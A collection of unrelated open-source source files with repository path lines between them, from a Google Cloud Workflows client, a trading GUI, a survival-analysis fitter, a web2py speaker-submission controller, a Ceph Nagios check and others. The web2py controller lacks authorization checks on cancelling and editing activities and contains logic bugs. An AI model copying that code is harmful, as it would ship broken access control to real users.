rpc Bar(google.protobuf.Empty) returns (google.protobuf.Empty); } The JSON representation for Empty is empty JSON object {}. """ # Create or coerce a protobuf request object. # Sanity check: If we got a request object, we should *not* have # gotten any keyword arguments that map to the request. has_flattened_params = any([name]) if request is not None and has_flattened_params: raise ValueError( "If the `request` argument is set, then none of " "the individual field arguments should be set." ) request = workflows.DeleteWorkflowRequest(request) # If we have keyword arguments corresponding to fields on the # request, apply these. if name is not None: request.name = name # Wrap the RPC method; this adds retry and timeout information, # and friendly error handling. rpc = gapic_v1.method_async.wrap_method( self._client._transport.delete_workflow, default_timeout=None, client_info=DEFAULT_CLIENT_INFO, ) # Certain fields should be provided within the metadata header; # add these here. metadata = tuple(metadata) + ( gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)), ) # Send the request. 
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,) # Wrap the response in an operation future. response = operation_async.from_gapic( response, self._client._transport.operations_client, empty_pb2.Empty, metadata_type=workflows.OperationMetadata, ) # Done; return the response. return response async def update_workflow( self, request: workflows.UpdateWorkflowRequest = None, *, workflow: workflows.Workflow = None, update_mask: field_mask_pb2.FieldMask = None, retry: retries.Retry = gapic_v1.method.DEFAULT, timeout: float = None, metadata: Sequence[Tuple[str, str]] = (), ) -> operation_async.AsyncOperation: r"""Updates an existing workflow. Running this method has no impact on already running executions of the workflow. A new revision of the workflow may be created as a result of a successful update operation. In that case, such revision will be used in new workflow executions. Args: request (:class:`google.cloud.workflows_v1.types.UpdateWorkflowRequest`): The request object. Request for the [UpdateWorkflow][google.cloud.workflows.v1.Workflows.UpdateWorkflow] method. workflow (:class:`google.cloud.workflows_v1.types.Workflow`): Required. Workflow to be updated. This corresponds to the ``workflow`` field on the ``request`` instance; if ``request`` is provided, this should not be set. update_mask (:class:`google.protobuf.field_mask_pb2.FieldMask`): List of fields to be updated. If not present, the entire workflow will be updated. This corresponds to the ``update_mask`` field on the ``request`` instance; if ``request`` is provided, this should not be set. retry (google.api_core.retry.Retry): Designation of what errors, if any, should be retried. timeout (float): The timeout for this request. metadata (Sequence[Tuple[str, str]]): Strings which should be sent along with the request as metadata. Returns: google.api_core.operation_async.AsyncOperation: An object representing a long-running operation. The result type for the operation will be :class:`google.cloud.workflows_v1.types.Workflow` Workflow program to be executed by Workflows. """ # Create or coerce a protobuf request object. # Sanity check: If we got a request object, we should *not* have # gotten any keyword arguments that map to the request. has_flattened_params = any([workflow, update_mask]) if request is not None and has_flattened_params: raise ValueError( "If the `request` argument is set, then none of " "the individual field arguments should be set." ) request = workflows.UpdateWorkflowRequest(request) # If we have keyword arguments corresponding to fields on the # request, apply these. if workflow is not None: request.workflow = workflow if update_mask is not None: request.update_mask = update_mask # Wrap the RPC method; this adds retry and timeout information, # and friendly error handling. rpc = gapic_v1.method_async.wrap_method( self._client._transport.update_workflow, default_timeout=None, client_info=DEFAULT_CLIENT_INFO, ) # Certain fields should be provided within the metadata header; # add these here. metadata = tuple(metadata) + ( gapic_v1.routing_header.to_grpc_metadata( (("workflow.name", request.workflow.name),) ), ) # Send the request. response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,) # Wrap the response in an operation future. response = operation_async.from_gapic( response, self._client._transport.operations_client, workflows.Workflow, metadata_type=workflows.OperationMetadata, ) # Done; return the response. 
return response try: DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo( gapic_version=pkg_resources.get_distribution("google-cloud-workflows",).version, ) except pkg_resources.DistributionNotFound: DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo() __all__ = ("WorkflowsAsyncClient",)
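A hedged sketch of driving the async client above; the project and location values are placeholders, and default application credentials are assumed to be available in the environment.

import asyncio

from google.cloud import workflows_v1


async def main():
    client = workflows_v1.WorkflowsAsyncClient()
    parent = "projects/my-project/locations/us-central1"  # placeholder values
    # list_workflows returns an async pager; iterating it resolves further pages lazily.
    pager = await client.list_workflows(parent=parent)
    async for workflow in pager:
        print(workflow.name)


asyncio.run(main())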
ybroze/trading-with-python
refs/heads/master
nautilus/nautilus.py
77
''' Created on 26 dec. 2011 Copyright: Jev Kuznetsov License: BSD ''' from PyQt4.QtCore import * from PyQt4.QtGui import * from ib.ext.Contract import Contract from ib.opt import ibConnection from ib.ext.Order import Order import tradingWithPython.lib.logger as logger from tradingWithPython.lib.eventSystem import Sender, ExampleListener import tradingWithPython.lib.qtpandas as qtpandas import numpy as np import pandas priceTicks = {1:'bid',2:'ask',4:'last',6:'high',7:'low',9:'close', 14:'open'} class PriceListener(qtpandas.DataFrameModel): def __init__(self): super(PriceListener,self).__init__() self._header = ['position','bid','ask','last'] def addSymbol(self,symbol): data = dict(zip(self._header,[0,np.nan,np.nan,np.nan])) row = pandas.DataFrame(data, index = pandas.Index([symbol])) self.df = self.df.append(row[self._header]) # append data and set correct column order def priceHandler(self,sender,event,msg=None): if msg['symbol'] not in self.df.index: self.addSymbol(msg['symbol']) if msg['type'] in self._header: self.df.ix[msg['symbol'],msg['type']] = msg['price'] self.signalUpdate() #print self.df class Broker(Sender): def __init__(self, name = "broker"): super(Broker,self).__init__() self.name = name self.log = logger.getLogger(self.name) self.log.debug('Initializing broker. Pandas version={0}'.format(pandas.__version__)) self.contracts = {} # a dict to keep track of subscribed contracts self._id2symbol = {} # id-> symbol dict self.tws = None self._nextId = 1 # tws subscription id self.nextValidOrderId = None def connect(self): """ connect to tws """ self.tws = ibConnection() # tws interface self.tws.registerAll(self._defaultHandler) self.tws.register(self._nextValidIdHandler,'NextValidId') self.log.debug('Connecting to tws') self.tws.connect() self.tws.reqAccountUpdates(True,'') self.tws.register(self._priceHandler,'TickPrice') def subscribeStk(self,symbol, secType='STK', exchange='SMART',currency='USD'): ''' subscribe to stock data ''' self.log.debug('Subscribing to '+symbol) c = Contract() c.m_symbol = symbol c.m_secType = secType c.m_exchange = exchange c.m_currency = currency subId = self._nextId self._nextId += 1 self.tws.reqMktData(subId,c,'',False) self._id2symbol[subId] = c.m_symbol self.contracts[symbol]=c def disconnect(self): self.tws.disconnect() #------event handlers-------------------- def _defaultHandler(self,msg): ''' default message handler ''' #print msg.typeName if msg.typeName == 'Error': self.log.error(msg) def _nextValidIdHandler(self,msg): self.nextValidOrderId = msg.orderId self.log.debug( 'Next valid order id:{0}'.format(self.nextValidOrderId)) def _priceHandler(self,msg): #translate to meaningful messages message = {'symbol':self._id2symbol[msg.tickerId], 'price':msg.price, 'type':priceTicks[msg.field]} self.dispatch('price',message) #-----------------GUI elements------------------------- class TableView(QTableView): """ extended table view """ def __init__(self,name='TableView1', parent=None): super(TableView,self).__init__(parent) self.name = name self.setSelectionBehavior(QAbstractItemView.SelectRows) def contextMenuEvent(self, event): menu = QMenu(self) Action = menu.addAction("print selected rows") Action.triggered.connect(self.printName) menu.exec_(event.globalPos()) def printName(self): print "Action triggered from " + self.name print 'Selected :' for idx in self.selectionModel().selectedRows(): print self.model().df.ix[idx.row(),:] class Form(QDialog): def __init__(self,parent=None): super(Form,self).__init__(parent) self.broker = Broker() self.price = 
PriceListener() self.broker.connect() symbols = ['SPY','XLE','QQQ','VXX','XIV'] for symbol in symbols: self.broker.subscribeStk(symbol) self.broker.register(self.price.priceHandler, 'price') widget = TableView(parent=self) widget.setModel(self.price) widget.horizontalHeader().setResizeMode(QHeaderView.Stretch) layout = QVBoxLayout() layout.addWidget(widget) self.setLayout(layout) def __del__(self): print 'Disconnecting.' self.broker.disconnect() if __name__=="__main__": print "Running nautilus" import sys app = QApplication(sys.argv) form = Form() form.show() app.exec_() print "All done."
CamDavidsonPilon/lifelines
refs/heads/master
lifelines/fitters/log_normal_fitter.py
1
# -*- coding: utf-8 -*- from scipy.special import erfinv import autograd.numpy as np from autograd.scipy.stats import norm from lifelines.fitters import KnownModelParametricUnivariateFitter from lifelines.utils import CensoringType class LogNormalFitter(KnownModelParametricUnivariateFitter): r""" This class implements an Log Normal model for univariate data. The model has parameterized form: .. math:: S(t) = 1 - \Phi\left(\frac{\log(t) - \mu}{\sigma}\right), \;\; \sigma >0 where :math:`\Phi` is the CDF of a standard normal random variable. This implies the cumulative hazard rate is .. math:: H(t) = -\log\left(1 - \Phi\left(\frac{\log(t) - \mu}{\sigma}\right)\right) After calling the ``.fit`` method, you have access to properties like: ``survival_function_``, ``mu_``, ``sigma_``. A summary of the fit is available with the method ``print_summary()`` Parameters ----------- alpha: float, optional (default=0.05) the level in the confidence intervals. Attributes ---------- cumulative_hazard_ : DataFrame The estimated cumulative hazard (with custom timeline if provided) hazard_ : DataFrame The estimated hazard (with custom timeline if provided) survival_function_ : DataFrame The estimated survival function (with custom timeline if provided) cumulative_density_ : DataFrame The estimated cumulative density function (with custom timeline if provided) density_: DataFrame The estimated density function (PDF) (with custom timeline if provided) variance_matrix_ : DataFrame The variance matrix of the coefficients median_survival_time_: float The median time to event mu_: float The fitted parameter in the model sigma_: float The fitted parameter in the model durations: array The durations provided event_observed: array The event_observed variable provided timeline: array The time line to use for plotting and indexing entry: array or None The entry array provided, or None """ mu_: float sigma_: float _fitted_parameter_names = ["mu_", "sigma_"] _bounds = [(None, None), (0, None)] _compare_to_values = np.array([0.0, 1.0]) def _create_initial_point(self, Ts, E, *args): if CensoringType.is_right_censoring(self): log_T = np.log(Ts[0]) elif CensoringType.is_left_censoring(self): log_T = np.log(Ts[1]) elif CensoringType.is_interval_censoring(self): if E.sum() > 0: log_T = np.log(Ts[1][E.astype(bool)]) else: log_T = np.array([0]) return np.array([np.median(log_T), 1.0]) @property def median_survival_time_(self) -> float: return np.exp(self.mu_) def percentile(self, p) -> float: return np.exp(self.mu_ + np.sqrt(2 * self.sigma_ ** 2) * erfinv(1 - 2 * p)) def _cumulative_hazard(self, params, times): mu_, sigma_ = params Z = (np.log(times) - mu_) / sigma_ return -norm.logsf(Z) def _log_hazard(self, params, times): mu_, sigma_ = params Z = (np.log(times) - mu_) / sigma_ return norm.logpdf(Z, loc=0, scale=1) - np.log(sigma_) - np.log(times) - norm.logsf(Z) def _log_1m_sf(self, params, times): mu_, sigma_ = params Z = (np.log(times) - mu_) / sigma_ return norm.logcdf(Z)
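A small end-to-end sketch of the fitter above on synthetic right-censored data; the sample size, censoring time and seed are arbitrary.

import numpy as np
from lifelines import LogNormalFitter

# Synthetic log-normal event times with administrative censoring at t=15.
rng = np.random.default_rng(0)
true_times = rng.lognormal(mean=2.0, sigma=0.5, size=500)
observed = true_times <= 15
durations = np.minimum(true_times, 15)

lnf = LogNormalFitter()
lnf.fit(durations, event_observed=observed)

print(lnf.mu_, lnf.sigma_)        # fitted parameters
print(lnf.median_survival_time_)  # exp(mu_)
lnf.print_summary()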
BridgeCityBicycleCoop/workstand
refs/heads/master
core/migrations/0002_auto_20170101_2054.py
1
# -*- coding: utf-8 -*- # Generated by Django 1.9.7 on 2017-01-01 20:54 from __future__ import unicode_literals from django.db import migrations, models import django.utils.timezone class Migration(migrations.Migration): dependencies = [ ('core', '0001_initial'), ] operations = [ migrations.AlterField( model_name='visit', name='created_at', field=models.DateTimeField(default=django.utils.timezone.now), ), ]
flisoldf/flisol-inscricoes
refs/heads/master
controllers/atividades.py
1
# -*- coding: utf-8 -*- @auth.requires_membership('Palestrante') def index(): """ Exibe a lista de atividades submetidas """ # Se não houver argumentos na URL, redireciona para a página inicial # O objetivo dessa verificação é não permitir que um palestrante visualize atividades de outro if not request.args: redirect(URL('default', 'index')) palestrante = request.args(0) id_user = str(session.auth.user.id) # Faz a consulta no banco de dados para pegar o id do currículo do palestrante curriculo_id = db(curriculo.id_usuario==session.auth.user.id).select().first() if curriculo_id: # Insere uma notificação para os palestrantes session.flash = "O prazo para a submissão de atividades é até o dia 18 de Março." # Verifica se o argumento passado na URL é o mesmo da sessão do usuário if palestrante == id_user: ativ = db(atividade.id_usuario==palestrante).select() return dict(ativ=ativ, id_user=int(palestrante)) elif form.errors: return dict(ativ=None, id_user=int(palestrante)) else: session.flash = "Escreva o seu mini-curriculo antes de cadastrar sua palestra." redirect(URL('atividades', 'minicurriculo')) def lista_atividades(): """ Exibe a lista de atividades submetidas somente para leitura. """ # Consulta as atividades cadastradas atividades = db().select(db.atividades.ALL, orderby=db.atividades.titulo) return dict(atividades=atividades) @auth.requires_membership('Palestrante') def nova(): """ Essa função é para inserção de novas atividades """ # Ocultando o campo status e a sala db.atividades.status.readable = \ db.atividades.status.writable = False db.atividades.id_sala.readable = \ db.atividades.id_sala.writable = False # Gera o formulário para inserir novas atividades form = SQLFORM(atividade,formstyle='divs',submit_button=T('Save'),_class='forms') # Captura o id do usuário logado no momento e popula no respectivo campo do formulário form.vars.id_usuario = session.auth.user.id # Faz a consulta no banco de dados para pegar o id do currículo do palestrante curriculo_id = db(curriculo.id_usuario==session.auth.user.id).select().first() # Popula o respectivo campo do id do currículo do usuário if not curriculo_id: redirect(URL('atividades', 'minicurriculo')) else: form.vars.id_curriculo = curriculo_id.id # Popula o status da atividade: 0 = Rejeitado, 1 = Aprovado, 2 = Pendente form.vars.status = 'Pendente' # Verifica se os dados inseridos passam em todas as validações do banco de dados e formulário if form.accepts(request.vars, session): session.flash = "Atividade submetida com sucesso" redirect(URL('atividades', 'index', args=session.auth.user.id)) elif form.errors: session.flash = "Erro ao inserir a Atividade. Abra o formulário e tente novamente." return dict(form=form) @auth.requires_membership('Palestrante') def editar(): """ Edita a palestra selecionada pelo palestrante. """ # Capturando o ID da Atividade selecionada id_atividade = request.args(0) or redirect(URL('atividades','index')) # Ocultando o campo ID e o Status db.atividades.id.readable = \ db.atividades.id.writable = False db.atividades.status.readable = \ db.atividades.status.writable = False # Criando o formulario de edicao form = SQLFORM(db.atividades, id_atividade,formstyle='divs',submit_button=T('Save'),_class='forms') if form.accepts(request.vars, session): session.flash = "Atividade atualizado com sucesso." redirect(URL('atividades', 'index', args=session.auth.user.id)) elif form.errors: session.flash = "Erro ao inserir a Atividade. Abra o formulário e tente novamente." 
return dict(form=form) @auth.requires_membership('Palestrante') def minicurriculo(): """ Essa função é para criar/atualizar mini-currículo """ # Captura o id do usuário logado id_user = session.auth.user.id # Consulta no banco para pegar o currículo do palestrante, caso houver atualizar = db(curriculo.id_usuario==id_user).select().first() # Se houver mini-currículo cadastrado, retorna o formulário para atualização if minicurriculo: # Ocultando o ID db.curriculo.id.readable = db.curriculo.id.writable = False form = SQLFORM(curriculo, atualizar, submit_button=T('Save')) form.vars.id_usuario = id_user # Caso não houver, retorna o formulário para criação else: form = SQLFORM(curriculo,formstyle='divs',submit_button=T('Save'),_class='forms') form.vars.id_usuario = id_user # Verifica se os dados inseridos batem com todas as validações e redireciona para Index, caso esteja ok. if form.accepts(request.vars, session): session.flash = 'Currículo atualizado com sucesso' redirect(URL('default', 'index')) elif form.errors: session.flash = "Mini-currículo não foi cadastrado com sucesso. Tente novamente" return dict(form=form) @auth.requires_membership('Administrador') def detalhes(): """ Exibe todos os detalhes da atividade selecionada. Com isso somente dois campos serão exibidos para edição: - Status da Atividade; - Sala da Atividade; """ id_atividade = request.args(0) # Pesquisa a atividade selecionada atividade = db(db.atividades.id == id_atividade).select().first() # Ocultando o ID do formulario db.atividades.id.readable = False # Se o argumento for igual a valor sala, # então exibe o formulario para associar uma sala # da atividade. Caso o valor seja status, então # exibe um formulário para alterar o status da atividade # selecionada. if request.args(1) == 'sala': form = SQLFORM(db.atividades,id_atividade,fields=['id_sala'],formstyle='divs',submit_button=T('Save')) return dict(atividade = atividade, form = form) elif request.args(1) == 'status': form = SQLFORM(db.atividades,id_atividade,fields=['status'],formstyle='divs',submit_button=T('Save')) return dict(atividade = atividade, form = form) if form.accepts(request.vars,session): session.flash = "Atividade atualizada com sucesso." elif form.errors: session.flash = "Erro ao atualizar a atividade, Verifique se foi atualizado a sala e/ou status." return dict(atividade = atividade, form = form) def cancelar(): """ Cancela a atividade selecionada pelo palestrante. """ # Captura o ID ou redireciona id_atividade = request.args(0) or redirect(URL('atividades','index')) # Cancela a atividade db(db.atividades.id == id_atividade).update(status='Cancelada') # Volta para a lista de atividades cadastradas redirect(URL('atividades','index')) # Exibe mensagem de sucesso session.flash = "Atividade cancelada com sucesso." return dict()
harmy/kbengine
refs/heads/master
kbe/src/lib/python/Lib/test/test_codecmaps_jp.py
57
#!/usr/bin/env python3 # # test_codecmaps_jp.py # Codec mapping tests for Japanese encodings # from test import support from test import test_multibytecodec_support import unittest class TestCP932Map(test_multibytecodec_support.TestBase_Mapping, unittest.TestCase): encoding = 'cp932' mapfileurl = 'http://www.unicode.org/Public/MAPPINGS/VENDORS/MICSFT/' \ 'WINDOWS/CP932.TXT' supmaps = [ (b'\x80', '\u0080'), (b'\xa0', '\uf8f0'), (b'\xfd', '\uf8f1'), (b'\xfe', '\uf8f2'), (b'\xff', '\uf8f3'), ] for i in range(0xa1, 0xe0): supmaps.append((bytes([i]), chr(i+0xfec0))) class TestEUCJPCOMPATMap(test_multibytecodec_support.TestBase_Mapping, unittest.TestCase): encoding = 'euc_jp' mapfilename = 'EUC-JP.TXT' mapfileurl = 'http://people.freebsd.org/~perky/i18n/EUC-JP.TXT' class TestSJISCOMPATMap(test_multibytecodec_support.TestBase_Mapping, unittest.TestCase): encoding = 'shift_jis' mapfilename = 'SHIFTJIS.TXT' mapfileurl = 'http://www.unicode.org/Public/MAPPINGS/OBSOLETE' \ '/EASTASIA/JIS/SHIFTJIS.TXT' pass_enctest = [ (b'\x81_', '\\'), ] pass_dectest = [ (b'\\', '\xa5'), (b'~', '\u203e'), (b'\x81_', '\\'), ] class TestEUCJISX0213Map(test_multibytecodec_support.TestBase_Mapping, unittest.TestCase): encoding = 'euc_jisx0213' mapfilename = 'EUC-JISX0213.TXT' mapfileurl = 'http://people.freebsd.org/~perky/i18n/EUC-JISX0213.TXT' class TestSJISX0213Map(test_multibytecodec_support.TestBase_Mapping, unittest.TestCase): encoding = 'shift_jisx0213' mapfilename = 'SHIFT_JISX0213.TXT' mapfileurl = 'http://people.freebsd.org/~perky/i18n/SHIFT_JISX0213.TXT' def test_main(): support.run_unittest(__name__) if __name__ == "__main__": test_main()
Team-Blackout/mecha-3.0.xx
refs/heads/master
scripts/tracing/draw_functrace.py
14679
#!/usr/bin/python """ Copyright 2008 (c) Frederic Weisbecker <fweisbec@gmail.com> Licensed under the terms of the GNU GPL License version 2 This script parses a trace provided by the function tracer in kernel/trace/trace_functions.c The resulted trace is processed into a tree to produce a more human view of the call stack by drawing textual but hierarchical tree of calls. Only the functions's names and the the call time are provided. Usage: Be sure that you have CONFIG_FUNCTION_TRACER # mount -t debugfs nodev /sys/kernel/debug # echo function > /sys/kernel/debug/tracing/current_tracer $ cat /sys/kernel/debug/tracing/trace_pipe > ~/raw_trace_func Wait some times but not too much, the script is a bit slow. Break the pipe (Ctrl + Z) $ scripts/draw_functrace.py < raw_trace_func > draw_functrace Then you have your drawn trace in draw_functrace """ import sys, re class CallTree: """ This class provides a tree representation of the functions call stack. If a function has no parent in the kernel (interrupt, syscall, kernel thread...) then it is attached to a virtual parent called ROOT. """ ROOT = None def __init__(self, func, time = None, parent = None): self._func = func self._time = time if parent is None: self._parent = CallTree.ROOT else: self._parent = parent self._children = [] def calls(self, func, calltime): """ If a function calls another one, call this method to insert it into the tree at the appropriate place. @return: A reference to the newly created child node. """ child = CallTree(func, calltime, self) self._children.append(child) return child def getParent(self, func): """ Retrieve the last parent of the current node that has the name given by func. If this function is not on a parent, then create it as new child of root @return: A reference to the parent. """ tree = self while tree != CallTree.ROOT and tree._func != func: tree = tree._parent if tree == CallTree.ROOT: child = CallTree.ROOT.calls(func, None) return child return tree def __repr__(self): return self.__toString("", True) def __toString(self, branch, lastChild): if self._time is not None: s = "%s----%s (%s)\n" % (branch, self._func, self._time) else: s = "%s----%s\n" % (branch, self._func) i = 0 if lastChild: branch = branch[:-1] + " " while i < len(self._children): if i != len(self._children) - 1: s += "%s" % self._children[i].__toString(branch +\ " |", False) else: s += "%s" % self._children[i].__toString(branch +\ " |", True) i += 1 return s class BrokenLineException(Exception): """If the last line is not complete because of the pipe breakage, we want to stop the processing and ignore this line. """ pass class CommentLineException(Exception): """ If the line is a comment (as in the beginning of the trace file), just ignore it. """ pass def parseLine(line): line = line.strip() if line.startswith("#"): raise CommentLineException m = re.match("[^]]+?\\] +([0-9.]+): (\\w+) <-(\\w+)", line) if m is None: raise BrokenLineException return (m.group(1), m.group(2), m.group(3)) def main(): CallTree.ROOT = CallTree("Root (Nowhere)", None, None) tree = CallTree.ROOT for line in sys.stdin: try: calltime, callee, caller = parseLine(line) except BrokenLineException: break except CommentLineException: continue tree = tree.getParent(caller) tree = tree.calls(callee, calltime) print CallTree.ROOT if __name__ == "__main__": main()
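For reference, a quick check of the trace-line format parseLine above expects; the sample line is fabricated, only the regular expression is taken from the script.

import re

# A made-up line in the function tracer's format: "<task>-<pid> [cpu] time: callee <-caller"
line = "bash-1994  [000]  4154.504826: do_sys_open <-sys_open"
match = re.match(r"[^]]+?\] +([0-9.]+): (\w+) <-(\w+)", line)
print(match.groups())  # ('4154.504826', 'do_sys_open', 'sys_open')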
wqshi/test
refs/heads/master
scipy_central/tagging/admin.py
5
from django.contrib import admin from models import Tag class TagAdmin(admin.ModelAdmin): list_display = ('slug', 'name', 'tag_type', 'description', 'id') list_display_links = ('slug',) list_per_page = 1000 ordering = ('slug',) admin.site.register(Tag, TagAdmin)
MER-GROUP/intellij-community
refs/heads/master
python/lib/Lib/hashlib.py
82
# $Id: hashlib.py 66095 2008-08-31 16:36:21Z gregory.p.smith $ # # Copyright (C) 2005 Gregory P. Smith (greg@electricrain.com) # Licensed to PSF under a Contributor Agreement. # __doc__ = """hashlib module - A common interface to many hash functions. new(name, string='') - returns a new hash object implementing the given hash function; initializing the hash using the given string data. Named constructor functions are also available, these are much faster than using new(): md5(), sha1(), sha224(), sha256(), sha384(), and sha512() More algorithms may be available on your platform but the above are guaranteed to exist. Choose your hash function wisely. Some have known collision weaknesses. sha384 and sha512 will be slow on 32 bit platforms. Hash objects have these methods: - update(arg): Update the hash object with the string arg. Repeated calls are equivalent to a single call with the concatenation of all the arguments. - digest(): Return the digest of the strings passed to the update() method so far. This may contain non-ASCII characters, including NUL bytes. - hexdigest(): Like digest() except the digest is returned as a string of double length, containing only hexadecimal digits. - copy(): Return a copy (clone) of the hash object. This can be used to efficiently compute the digests of strings that share a common initial substring. For example, to obtain the digest of the string 'Nobody inspects the spammish repetition': >>> import hashlib >>> m = hashlib.md5() >>> m.update("Nobody inspects") >>> m.update(" the spammish repetition") >>> m.digest() '\\xbbd\\x9c\\x83\\xdd\\x1e\\xa5\\xc9\\xd9\\xde\\xc9\\xa1\\x8d\\xf0\\xff\\xe9' More condensed: >>> hashlib.sha224("Nobody inspects the spammish repetition").hexdigest() 'a4337bc45a8fc544c03f52dc550cd6e1e87021bc896588bd79e901e2' """ def __get_builtin_constructor(name): if name in ('SHA1', 'sha1'): import _sha return _sha.new elif name in ('MD5', 'md5'): import _md5 return _md5.new elif name in ('SHA256', 'sha256', 'SHA224', 'sha224'): import _sha256 bs = name[3:] if bs == '256': return _sha256.sha256 elif bs == '224': return _sha256.sha224 elif name in ('SHA512', 'sha512', 'SHA384', 'sha384'): import _sha512 bs = name[3:] if bs == '512': return _sha512.sha512 elif bs == '384': return _sha512.sha384 raise ValueError, "unsupported hash type" def __py_new(name, string=''): """new(name, string='') - Return a new hashing object using the named algorithm; optionally initialized with a string. """ return __get_builtin_constructor(name)(string) def __hash_new(name, string=''): """new(name, string='') - Return a new hashing object using the named algorithm; optionally initialized with a string. """ try: return _hashlib.new(name, string) except ValueError: # If the _hashlib module (OpenSSL) doesn't support the named # hash, try using our builtin implementations. # This allows for SHA224/256 and SHA384/512 support even though # the OpenSSL library prior to 0.9.8 doesn't provide them. return __get_builtin_constructor(name)(string) try: import _hashlib # use the wrapper of the C implementation new = __hash_new for opensslFuncName in filter(lambda n: n.startswith('openssl_'), dir(_hashlib)): funcName = opensslFuncName[len('openssl_'):] try: # try them all, some may not work due to the OpenSSL # version not supporting that algorithm. 
f = getattr(_hashlib, opensslFuncName) f() # Use the C function directly (very fast) exec funcName + ' = f' except ValueError: try: # Use the builtin implementation directly (fast) exec funcName + ' = __get_builtin_constructor(funcName)' except ValueError: # this one has no builtin implementation, don't define it pass # clean up our locals del f del opensslFuncName del funcName except ImportError: # We don't have the _hashlib OpenSSL module? # use the built in legacy interfaces via a wrapper function new = __py_new # lookup the C function to use directly for the named constructors md5 = __get_builtin_constructor('md5') sha1 = __get_builtin_constructor('sha1') sha224 = __get_builtin_constructor('sha224') sha256 = __get_builtin_constructor('sha256') sha384 = __get_builtin_constructor('sha384') sha512 = __get_builtin_constructor('sha512')
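A short sketch exercising the two entry points exposed above, the named constructors and new(); the two code paths should produce identical digests for the same input.

import hashlib

data = b"Nobody inspects the spammish repetition"
direct = hashlib.sha256(data).hexdigest()

# Incremental hashing via the generic factory function.
incremental = hashlib.new("sha256")
incremental.update(b"Nobody inspects")
incremental.update(b" the spammish repetition")

assert incremental.hexdigest() == direct
print(direct)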
PetePriority/home-assistant
refs/heads/dev
homeassistant/helpers/icon.py
19
"""Icon helper methods.""" from typing import Optional def icon_for_battery_level(battery_level: Optional[int] = None, charging: bool = False) -> str: """Return a battery icon valid identifier.""" icon = 'mdi:battery' if battery_level is None: return icon + '-unknown' if charging and battery_level > 10: icon += '-charging-{}'.format( int(round(battery_level / 20 - .01)) * 20) elif charging: icon += '-outline' elif battery_level <= 5: icon += '-alert' elif 5 < battery_level < 95: icon += '-{}'.format(int(round(battery_level / 10 - .01)) * 10) return icon
upadhyay-prashant/puppet-rjil
refs/heads/master
files/tests/ceph_health.py
31
#!/usr/bin/env python # # Copyright (c) 2013 SWITCH http://www.switch.ch # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import argparse import os import subprocess import sys __version__ = '1.0.1' # default ceph values CEPH_COMMAND = '/usr/bin/ceph' # nagios exit code STATUS_OK = 0 STATUS_WARNING = 1 STATUS_ERROR = 2 STATUS_UNKNOWN = 3 def main(): # parse args parser = argparse.ArgumentParser(description="'ceph health' nagios plugin.") parser.add_argument('-e','--exe', help='ceph executable [%s]' % CEPH_COMMAND) parser.add_argument('-c','--conf', help='alternative ceph conf file') parser.add_argument('-m','--monaddress', help='ceph monitor address[:port]') parser.add_argument('-i','--id', help='ceph client id') parser.add_argument('-k','--keyring', help='ceph client keyring file') parser.add_argument('-d','--detail', help="exec 'ceph health detail'", action='store_true') parser.add_argument('-V','--version', help='show version and exit', action='store_true') args = parser.parse_args() # validate args ceph_exec = args.exe if args.exe else CEPH_COMMAND if not os.path.exists(ceph_exec): print "ERROR: ceph executable '%s' doesn't exist" % ceph_exec return STATUS_UNKNOWN if args.version: print 'version %s' % __version__ return STATUS_OK if args.conf and not os.path.exists(args.conf): print "ERROR: ceph conf file '%s' doesn't exist" % args.conf return STATUS_UNKNOWN if args.keyring and not os.path.exists(args.keyring): print "ERROR: keyring file '%s' doesn't exist" % args.keyring return STATUS_UNKNOWN # build command ceph_health = [ceph_exec] if args.monaddress: ceph_health.append('-m') ceph_health.append(args.monaddress) if args.conf: ceph_health.append('-c') ceph_health.append(args.conf) if args.id: ceph_health.append('--id') ceph_health.append(args.id) if args.keyring: ceph_health.append('--keyring') ceph_health.append(args.keyring) ceph_health.append('health') if args.detail: ceph_health.append('detail') #print ceph_health # exec command p = subprocess.Popen(ceph_health,stdout=subprocess.PIPE,stderr=subprocess.PIPE) output, err = p.communicate() # parse output #print "output:", output #print "err:", err if output: # merge multi-lines of output in one line one_line = output.replace('\n','; ') if one_line.startswith('HEALTH_OK'): #print 'HEALTH OK:', one_line[len('HEALTH_OK')+1:] one_line= one_line[len('HEALTH_OK')+1:].strip() if one_line: print 'HEALTH OK:', one_line else: print 'HEALTH OK' return STATUS_OK elif one_line.startswith('HEALTH_WARN'): print 'HEALTH WARNING:', one_line[len('HEALTH_WARN')+1:] return STATUS_WARNING elif one_line.startswith('HEALTH_ERR'): print 'HEALTH ERROR:', one_line[len('HEALTH_ERR')+1:] return STATUS_ERROR else: print one_line elif err: # read only first line of error one_line = err.split('\n')[0] if '-1 ' in one_line: idx = one_line.rfind('-1 ') print 'ERROR: %s: %s' % (ceph_exec, one_line[idx+len('-1 '):]) else: print one_line return STATUS_UNKNOWN if __name__ == "__main__": sys.exit(main())
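A hedged sketch of wrapping the Nagios plugin above from Python; the script path is hypothetical, and the exit code follows the convention defined in the script (0=OK, 1=WARNING, 2=ERROR, 3=UNKNOWN).

import subprocess

# Run the plugin as a monitoring system would and inspect its exit status.
status = subprocess.call(["python", "ceph_health.py", "--detail"])
print("nagios status code:", status)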
Voltir/django-guardian
refs/heads/master
docs/exts.py
109
def setup(app): app.add_crossref_type( directivename = "admin", rolename = "admin", indextemplate = "pair: %s; admin", ) app.add_crossref_type( directivename = "command", rolename = "command", indextemplate = "pair: %s; command", ) app.add_crossref_type( directivename = "form", rolename = "form", indextemplate = "pair: %s; form", ) app.add_crossref_type( directivename = "manager", rolename = "manager", indextemplate = "pair: %s; manager", ) app.add_crossref_type( directivename = "mixin", rolename = "mixin", indextemplate = "pair: %s; mixin", ) app.add_crossref_type( directivename = "model", rolename = "model", indextemplate = "pair: %s; model", ) app.add_crossref_type( directivename = "setting", rolename = "setting", indextemplate = "pair: %s; setting", ) app.add_crossref_type( directivename = "shortcut", rolename = "shortcut", indextemplate = "pair: %s; shortcut", )
